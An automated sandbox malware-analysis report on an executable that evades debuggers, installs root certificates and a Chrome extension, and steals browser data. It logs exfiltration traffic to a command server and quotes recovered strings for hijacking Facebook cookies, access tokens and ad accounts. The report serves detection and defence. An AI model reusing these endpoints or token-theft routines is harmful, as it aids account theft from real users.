Analysis Report Cyfj6XGbkd.exe

Overview

General Information

Sample Name: Cyfj6XGbkd.exe
Analysis ID: 346134
MD5: 63204eb716c856723a010747d58a6b00
SHA1: 7e97f00b4c3580cedee02c448ac9aeb54afefbd2
SHA256: 6d2db66a98ec5730bdcbc41dc7c78210fe24fe48bf7e44b59ab01c2084900456

Most interesting Screenshot:

Detection

Score: 93
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Conhost Parent Proces Executions
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Metadefender: Detection: 24% Perma Link
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe ReversingLabs: Detection: 58%
Multi AV Scanner detection for submitted file
Source: Cyfj6XGbkd.exe Virustotal: Detection: 40% Perma Link
Source: Cyfj6XGbkd.exe Metadefender: Detection: 24% Perma Link
Source: Cyfj6XGbkd.exe ReversingLabs: Detection: 58%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Cyfj6XGbkd.exe Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext, 0_2_1001F720
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext, 2_2_1001F720

Compliance:

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Unpacked PE file: 0.2.Cyfj6XGbkd.exe.2880000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Unpacked PE file: 4.2.56BB1610C0318054.exe.2620000.5.unpack
Uses 32bit PE files
Source: Cyfj6XGbkd.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Uses new MSVCR Dlls
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611971443428.exe, 00000008.00000000.254487311.000000000040F000.00000002.00020000.sdmp, 1611971443428.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001C.00000000.316118028.0000000000F4C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSIB2E9.tmp.1.dr

Spreading:

barindex
Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: z: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: x: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: v: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: t: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: r: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: p: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: n: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: l: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: j: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: h: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: f: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: b: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: y: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: w: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: u: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: s: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: q: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: o: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: m: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: k: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: i: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: g: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: e: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: c: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: a: Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001A170 FindFirstFileA,FindClose, 0_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1001A170 FindFirstFileA,FindClose, 2_2_1001A170
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior

Networking:

barindex
Uses ping.exe to check the status of other devices and networks
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: */*
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 1393Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: */*
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exe String found in binary or memory: &AboutZwww.VB-CABLE.com web site[News are on Facebook ! equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp String found in binary or memory: 13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale":"en","description":"","icons":{"128":"128.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDC/HotmFlyuz5FaHaIbVBhhL4BwbcUtsfWwzgUMpZt5ZsLB2nW/Y5xwNkkPANYGdVsJkT2GPpRRIKBO5QiJ7jPMa3EZtcZHpkygBlQLSjMhdrAKevpKgIl6YTkwzNvExY6rzVDzeE9zqnIs33eppY4S5QcoALMxuSWlMKqgFQjHQIDAQAB","manifest_version":2,"name":"YouTube","update_url":"http://clients2.google.com/service/update2/crx","version":"4.2.8"},"page_ordinal":"n","path":"blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0","preferences":{},"regular_only_preferences":{},"state":1,"was_installed_by_default":true,"was_installed_by_oem":false},"felcaaldnbdncclmgdcncolpebgiejap":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"yn","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245951495844949","lastpingday":"13245947458072931","location":1,"manifest":{"api_console_project_id":"1083656409722","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit spreadsheets","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC0AHrkP4MHPDKQI/O9LqZjtM24hKApaT3uVHeOduC06ZXWuwVRvx2wy5JUmMHfefXRG26tErgZSWpbxkm+2xfplKnT+grXF771HDgsNrNXERJHq7tnoYsWRiG3Gbs5BI4Ei+naZ/nyiWblbT4GyuD9N5yXNtoM0AnK+0FYhbO7IwIDAQAB","manifest_version":2,"name":"Sheets","offline_enabled":true,"update_url":"https://clients2.google.com/service/update2/crx","version":"1.2"},"page_ordinal":"n","path":"felcaaldnbdncclmgdcncolpebgiejap\\1.2_0","preferences":{},"regular_only_preferences":{},"state":1,"was_installed_by_default":true,"was_installed_by_oem":false,"withholding_permissions":false},"gfdkimpbcpahaombhbimeihdjnejgicl":{"active_permissions":{"api":["feedbackPrivate"],"explicit_host":["chrome://resources/*"],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":["feedbackPrivate.onFeedbackRequested"],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245951485617462","location":5,"manifest":{"app":{"background":{"scripts":["js/event_handler.js"]},"content_security_policy":"default-src 'none'; script-src 'self' blob: filesystem: chrome://resources; style-src 'unsafe-inline' blob: chrome: file: filesystem: data: *; img-src * blob: chrome: file: filesystem: data:; media-src 'self' blob: filesystem:"},"description":"Send feedback to Google","display_in_launcher":false,"display_in_new_tab_page":false,"icons":{"192":"images/icon192
Source: 56BB1610C0318054.exe String found in binary or memory: _time":"13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
